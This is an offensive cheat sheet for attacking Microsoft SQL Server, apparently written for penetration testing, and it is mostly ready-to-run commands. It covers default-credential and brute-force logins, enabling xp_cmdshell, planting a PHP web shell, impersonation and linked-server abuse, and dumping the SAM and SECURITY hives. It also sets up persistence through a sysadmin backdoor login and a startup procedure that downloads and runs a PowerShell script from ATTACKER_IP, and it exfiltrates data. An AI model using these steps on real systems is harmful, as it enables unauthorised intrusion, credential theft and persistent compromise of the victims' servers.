Microsoft SQL Server

Environment Variables / Setup

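# Target and credential variables used by the commands below.
# DC_IP is referenced later (impacket-GetUserSPNs -dc-ip $DC_IP) but was not
# defined here; it is added so the page's commands are self-consistent.
# Note: exporting USER overrides the shell's own $USER for this session.
export IP=
export PORT=1433
export USER=sa
export PASS=password
export DOMAIN=domain.local
export DC_IP=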

Phase 1: MSSQL Service Discovery

Nmap MSSQL Scripts

nmap --script=ms-sql-* -p $PORT $IP

Service Detection

# Check MSSQL service
nmap -sV -p $PORT $IP

# UDP discovery (SQL Server Browser)
nmap -sU -p 1434 $IP

# Banner grabbing
telnet $IP $PORT

Phase 2: Authentication Testing

Anonymous Access Testing

# Test Windows authentication
impacket-mssqlclient $IP -windows-auth

# Test SQL authentication
impacket-mssqlclient $IP

Default Credentials Testing

# Common MSSQL default credentials
impacket-mssqlclient $USER:$PASS@$IP
impacket-mssqlclient sa:@$IP
impacket-mssqlclient sa:sa@$IP
impacket-mssqlclient sa:password@$IP
impacket-mssqlclient administrator:password@$IP

# Windows authentication
impacket-mssqlclient domain/user:password@$IP -windows-auth

Password Brute Force

# Using hydra
hydra -L /usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt $IP mssql

# Using nmap
nmap --script ms-sql-brute --script-args userdb=/usr/share/wordlists/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p $PORT $IP

Phase 3: MSSQL Enumeration

Basic Information Gathering

# Connect to MSSQL
impacket-mssqlclient $USER:$PASS@$IP

# Basic enumeration
SELECT @@version;
SELECT USER_NAME();
SELECT DB_NAME();
SELECT name FROM sys.databases;
SELECT name FROM sys.tables;

Database and Table Enumeration

# List all databases
SELECT name FROM master.dbo.sysdatabases;

# Switch database
USE database_name;

# List tables in current database
SELECT table_name FROM information_schema.tables;

# List columns in table
SELECT column_name FROM information_schema.columns WHERE table_name='users';

# Show table contents
SELECT * FROM users;

User and Permission Enumeration

# Show current user
SELECT SYSTEM_USER;
SELECT USER;

# List all SQL logins
SELECT name FROM master.dbo.syslogins;

# Check sysadmin privileges
SELECT IS_SRVROLEMEMBER('sysadmin');

# List logins that are members of the sysadmin server role
SELECT name FROM master.dbo.syslogins WHERE sysadmin = 1;

Phase 4: MSSQL Command Execution

xp_cmdshell (Primary Attack Vector)

# Check if xp_cmdshell is enabled
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# Enable xp_cmdshell (requires sysadmin)
-- Server-wide configuration change: both sp_configure calls need sysadmin
-- (see the note above) and the setting stays in effect until it is set
-- back to 0 -- every later login on the instance can use xp_cmdshell.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

# Execute commands
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'ipconfig';
EXEC xp_cmdshell 'net user';

Alternative Command Execution Methods

# Using sp_OACreate (if xp_cmdshell blocked)
DECLARE @myshell INT;
EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT;
EXEC sp_oamethod @myshell, 'run', null, 'cmd /c "echo test > c:\temp\test.txt"';

# Using SQL Agent Jobs (requires privileges)
USE msdb;
EXEC dbo.sp_add_job @job_name = 'test_job';
EXEC sp_add_jobstep @job_name = 'test_job', @step_name = 'test_step', @subsystem = 'cmdexec', @command = 'whoami > c:\temp\output.txt';
EXEC dbo.sp_add_jobserver @job_name = 'test_job';
EXEC dbo.sp_start_job N'test_job';

Phase 5: MSSQL File Operations

Reading Files

# Read files using BULK INSERT
CREATE TABLE temp (line varchar(8000));
BULK INSERT temp FROM 'c:\windows\system32\drivers\etc\hosts';
SELECT * FROM temp;
DROP TABLE temp;

# Using OPENROWSET (if enabled)
SELECT * FROM OPENROWSET(BULK 'c:\windows\system32\drivers\etc\hosts', SINGLE_CLOB) AS Contents;

Writing Files

# Write to a file via xp_cmdshell (shell echo redirection, not bcp)
EXEC xp_cmdshell 'echo "evil content" > c:\temp\evil.txt';

# Create web shell
EXEC xp_cmdshell 'echo ^<?php system($_GET["cmd"]); ?^> > c:\inetpub\wwwroot\shell.php';

Phase 6: MSSQL Privilege Escalation

Service Account Impersonation

# Check for impersonation privileges
SELECT name FROM sys.server_permissions p LEFT JOIN sys.server_principals pr ON pr.principal_id = p.grantee_principal_id WHERE p.permission_name = 'IMPERSONATE';

# Impersonate sa user
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER;

# Check current privileges after impersonation
SELECT IS_SRVROLEMEMBER('sysadmin');

Linked Server Exploitation

# Enumerate remote and linked servers (in sysservers, isremote = 1 marks remote servers and 0 marks linked servers; sp_linkedservers lists linked servers directly)
SELECT name FROM master.dbo.sysservers WHERE isremote = 1;
EXEC sp_linkedservers;

# Execute queries on linked servers
SELECT * FROM OPENQUERY("LINKED_SERVER", 'SELECT @@version');

# Execute commands through linked servers
SELECT * FROM OPENQUERY("LINKED_SERVER", 'SELECT @@version; EXEC xp_cmdshell ''whoami''');

Phase 7: Hash Extraction

Extract Password Hashes

# Extract MSSQL hashes (requires sysadmin)
SELECT name, password_hash FROM sys.sql_logins;

# Extract Windows hashes via xp_cmdshell
EXEC xp_cmdshell 'reg save hklm\sam c:\temp\sam.save';
EXEC xp_cmdshell 'reg save hklm\security c:\temp\security.save';
EXEC xp_cmdshell 'reg save hklm\system c:\temp\system.save';

Crack Extracted Hashes

# Use hashcat for MSSQL hashes
hashcat -m 1731 mssql_hashes.txt /usr/share/wordlists/rockyou.txt

# Use john for extracted hashes
john --format=mssql hash_file.txt

Phase 8: Post-Exploitation

Persistence via MSSQL

# Create backdoor login
-- Persistence: a new SQL login added to the sysadmin role.
-- Defender note: new SQL logins and sysadmin membership changes are
-- high-value audit events on any instance.
CREATE LOGIN backdoor WITH PASSWORD = 'P@ssw0rd123';
EXEC sp_addsrvrolemember 'backdoor', 'sysadmin';

# Create startup stored procedure
USE master;
-- A procedure marked with sp_procoption 'startup' = 'on' runs each time the
-- SQL Server service starts; this one calls xp_cmdshell, so it also depends
-- on xp_cmdshell being enabled. Startup-marked procedures in master are a
-- small, easily audited set.
CREATE PROCEDURE sp_backdoor AS EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(''http://ATTACKER_IP/shell.ps1'')"';
EXEC sp_procoption @ProcName = 'sp_backdoor', @OptionName = 'startup', @OptionValue = 'on';

Data Exfiltration

# Export database contents
EXEC xp_cmdshell 'sqlcmd -E -Q "SELECT * FROM database.dbo.users" -o "c:\temp\users.txt"';

# Backup database
BACKUP DATABASE database_name TO DISK = 'c:\temp\database_backup.bak';

Phase 9: MSSQL in Active Directory

Kerberos Authentication

# Connect using Kerberos ticket
impacket-mssqlclient -k -no-pass $DOMAIN/$USER@$IP.$DOMAIN

# Request service ticket for MSSQL
impacket-GetUserSPNs $DOMAIN/$USER:$PASS -dc-ip $DC_IP -target-domain $DOMAIN

Domain Privilege Escalation

# Check the authentication mode (IsIntegratedSecurityOnly reports 1 for Windows-only and 0 for mixed mode; it does not reveal the service account)
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly');

# If service account has high privileges, abuse for domain escalation
EXEC xp_cmdshell 'powershell -c "whoami /priv"';

MSSQL Security Misconfigurations

Common Issues to Check

  1. Default credentials (sa with weak/no password)
  2. xp_cmdshell enabled with sysadmin access
  3. Excessive service account privileges
  4. Linked server misconfigurations
  5. Impersonation privileges granted
  6. SQL Agent job permissions
  7. Weak authentication (SQL Server auth vs Windows auth)

MSSQL Enumeration Checklist

  • Anonymous access testing
  • Default credentials testing
  • User enumeration and privilege checking
  • Database and table discovery
  • xp_cmdshell capability testing
  • Linked server enumeration
  • Impersonation privileges checking
  • File read/write operations
  • Hash extraction attempts

Tools Summary

# Enumeration & Exploitation
impacket-mssqlclient, nmap mssql scripts

# Hash cracking
hashcat, john

# Post-exploitation
sqlcmd, PowerShell, custom stored procedures

Common MSSQL Ports

1433/tcp  - MSSQL default
1434/udp  - SQL Server Browser Service

Next Steps

Once MSSQL access is gained:

  1. Enable xp_cmdshell for command execution
  2. Extract sensitive data from databases
  3. Check for linked servers and lateral movement
  4. Attempt privilege escalation via service accounts
  5. Extract password hashes for further attacks

Resources